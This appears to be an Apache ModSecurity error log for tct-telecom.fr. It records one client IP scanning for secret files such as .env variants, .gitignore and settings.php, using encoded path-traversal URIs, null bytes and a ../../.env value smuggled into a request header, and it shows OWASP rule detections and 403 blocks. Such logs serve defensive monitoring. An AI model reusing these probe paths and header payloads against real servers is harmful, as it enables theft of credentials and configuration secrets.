[unique_id "agKVhDue9Sp-pIv_Bb63xgAAAVg"]
[Tue May 12 04:50:44.291583 2026] [security2:error] [pid 1730207:tid 1730233] [client 93.123.109.165:7702] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/sites/default/settings.php"] [unique_id "agKVhDue9Sp-pIv_Bb63xgAAAVg"]
[Tue May 12 04:50:44.292121 2026] [security2:error] [pid 1730175:tid 1730190] [client 93.123.109.165:7646] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.gitignore"] [unique_id "agKVhHo6NvB9WXx5V-6hngAAAQ0"]
[Tue May 12 04:50:44.292126 2026] [security2:error] [pid 1730207:tid 1730212] [client 93.123.109.165:7724] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agKVhDue9Sp-pIv_Bb63xwAAAUM"]
[Tue May 12 04:50:44.292163 2026] [security2:error] [pid 1825287:tid 1825330] [client 93.123.109.165:7768] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVhAgpmE1yW0glLdghfwAAANg"]
[Tue May 12 04:50:44.292248 2026] [security2:error] [pid 1730175:tid 1730190] [client 93.123.109.165:7646] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.gitignore"] [unique_id "agKVhHo6NvB9WXx5V-6hngAAAQ0"]
[Tue May 12 04:50:44.292261 2026] [security2:error] [pid 1730207:tid 1730212] [client 93.123.109.165:7724] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agKVhDue9Sp-pIv_Bb63xwAAAUM"]
[Tue May 12 04:50:44.292287 2026] [security2:error] [pid 1825287:tid 1825330] [client 93.123.109.165:7768] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVhAgpmE1yW0glLdghfwAAANg"]
[Tue May 12 04:50:44.293629 2026] [security2:error] [pid 1820198:tid 1820213] [client 93.123.109.165:7628] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/api/.env"] [unique_id "agKVhM1tk6y7yBJLpJoszQAAAI0"]
[Tue May 12 04:50:44.293756 2026] [security2:error] [pid 1820198:tid 1820213] [client 93.123.109.165:7628] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/api/.env"] [unique_id "agKVhM1tk6y7yBJLpJoszQAAAI0"]
[Tue May 12 04:50:44.294013 2026] [security2:error] [pid 1730175:tid 1730187] [client 93.123.109.165:7610] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/config/.env"] [unique_id "agKVhHo6NvB9WXx5V-6hnwAAAQo"]
[Tue May 12 04:50:44.294141 2026] [security2:error] [pid 1730175:tid 1730187] [client 93.123.109.165:7610] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/config/.env"] [unique_id "agKVhHo6NvB9WXx5V-6hnwAAAQo"]
[Tue May 12 04:50:44.294773 2026] [core:error] [pid 1808852:tid 1808871] [client 93.123.109.165:7648] AH10244: invalid URI path (/storage/../../../.env)
[Tue May 12 04:50:44.294841 2026] [security2:error] [pid 1730207:tid 1730218] [client 93.123.109.165:7722] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/app/.env"] [unique_id "agKVhDue9Sp-pIv_Bb63yAAAAUk"]
[Tue May 12 04:50:44.294971 2026] [security2:error] [pid 1730207:tid 1730218] [client 93.123.109.165:7722] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/app/.env"] [unique_id "agKVhDue9Sp-pIv_Bb63yAAAAUk"]
[Tue May 12 04:50:44.295067 2026] [security2:error] [pid 1825287:tid 1825316] [client 93.123.109.165:7734] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVhAgpmE1yW0glLdghgAAAAMs"]
[Tue May 12 04:50:44.295192 2026] [security2:error] [pid 1825287:tid 1825316] [client 93.123.109.165:7734] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVhAgpmE1yW0glLdghgAAAAMs"]
[Tue May 12 04:50:44.296012 2026] [security2:error] [pid 1730175:tid 1730201] [client 93.123.109.165:7676] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /..%252f found within REQUEST_URI_RAW: /..%252f..%252f.ENV"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/..%2f..%2f.ENV"] [unique_id "agKVhHo6NvB9WXx5V-6hoAAAARg"]
[Tue May 12 04:50:44.296114 2026] [security2:error] [pid 1730175:tid 1730201] [client 93.123.109.165:7676] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /../../.ENV"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/..%2f..%2f.ENV"] [unique_id "agKVhHo6NvB9WXx5V-6hoAAAARg"]
[Tue May 12 04:50:44.296176 2026] [security2:error] [pid 1730175:tid 1730201] [client 93.123.109.165:7676] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/..%2f..%2f.ENV"] [unique_id "agKVhHo6NvB9WXx5V-6hoAAAARg"]
[Tue May 12 04:50:44.296225 2026] [security2:error] [pid 1820198:tid 1820223] [client 93.123.109.165:7742] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/v1/health"] [unique_id "agKVhM1tk6y7yBJLpJoszgAAAJc"]
[Tue May 12 04:50:44.296232 2026] [security2:error] [pid 1730175:tid 1730201] [client 93.123.109.165:7676] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/..%2f..%2f.ENV"] [unique_id "agKVhHo6NvB9WXx5V-6hoAAAARg"]
[Tue May 12 04:50:44.296270 2026] [security2:error] [pid 1820198:tid 1820223] [client 93.123.109.165:7742] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/v1/health"] [unique_id "agKVhM1tk6y7yBJLpJoszgAAAJc"]
[Tue May 12 04:50:44.296300 2026] [security2:error] [pid 1820198:tid 1820223] [client 93.123.109.165:7742] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/v1/health"] [unique_id "agKVhM1tk6y7yBJLpJoszgAAAJc"]
[Tue May 12 04:50:44.296380 2026] [security2:error] [pid 1730175:tid 1730201] [client 93.123.109.165:7676] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 20)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/..%2f..%2f.ENV"] [unique_id "agKVhHo6NvB9WXx5V-6hoAAAARg"]
[Tue May 12 04:50:44.296479 2026] [security2:error] [pid 1820198:tid 1820223] [client 93.123.109.165:7742] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/api/v1/health"] [unique_id "agKVhM1tk6y7yBJLpJoszgAAAJc"]
[Tue May 12 04:50:44.296532 2026] [security2:error] [pid 1820198:tid 1820223] [client 93.123.109.165:7742] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/api/v1/health"] [unique_id "agKVhM1tk6y7yBJLpJoszgAAAJc"]
[Tue May 12 04:50:44.296585 2026] [security2:error] [pid 1820198:tid 1820223] [client 93.123.109.165:7742] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/api/v1/health"] [unique_id "agKVhM1tk6y7yBJLpJoszgAAAJc"]
[Tue May 12 04:50:44.296959 2026] [security2:error] [pid 1820198:tid 1820223] [client 93.123.109.165:7742] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/api/v1/health"] [unique_id "agKVhM1tk6y7yBJLpJoszgAAAJc"]
[Tue May 12 04:50:44.338200 2026] [security2:error] [pid 1820198:tid 1820223] [client 93.123.109.165:7742] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVhM1tk6y7yBJLpJoszgAAAJc"]
[Tue May 12 04:50:44.748203 2026] [security2:error] [pid 1730207:tid 1730218] [client 93.123.109.165:7722] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVhDue9Sp-pIv_Bb63yAAAAUk"]
[Tue May 12 04:50:44.849603 2026] [core:error] [pid 1808852:tid 1808860] [client 93.123.109.165:7788] AH10244: invalid URI path (/%2e%2e/%2e%2e/.env)
[Tue May 12 04:50:44.851471 2026] [security2:error] [pid 1825179:tid 1825209] [client 93.123.109.165:7932] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.production.local"] [unique_id "agKVhNr1yOh9TvizeziSmQAAAEs"]
[Tue May 12 04:50:44.851579 2026] [security2:error] [pid 1730175:tid 1730186] [client 93.123.109.165:7946] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.ENV"] [unique_id "agKVhHo6NvB9WXx5V-6hoQAAAQk"]
[Tue May 12 04:50:44.851696 2026] [security2:error] [pid 1825179:tid 1825209] [client 93.123.109.165:7932] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.production.local"] [unique_id "agKVhNr1yOh9TvizeziSmQAAAEs"]
[Tue May 12 04:50:44.851753 2026] [security2:error] [pid 1730175:tid 1730186] [client 93.123.109.165:7946] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.ENV"] [unique_id "agKVhHo6NvB9WXx5V-6hoQAAAQk"]
[Tue May 12 04:50:44.851923 2026] [security2:error] [pid 1730207:tid 1730227] [client 93.123.109.165:7908] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/v1/health"] [unique_id "agKVhDue9Sp-pIv_Bb63yQAAAVI"]
[Tue May 12 04:50:44.851977 2026] [security2:error] [pid 1730207:tid 1730227] [client 93.123.109.165:7908] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/v1/health"] [unique_id "agKVhDue9Sp-pIv_Bb63yQAAAVI"]
[Tue May 12 04:50:44.852006 2026] [security2:error] [pid 1730207:tid 1730227] [client 93.123.109.165:7908] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/v1/health"] [unique_id "agKVhDue9Sp-pIv_Bb63yQAAAVI"]
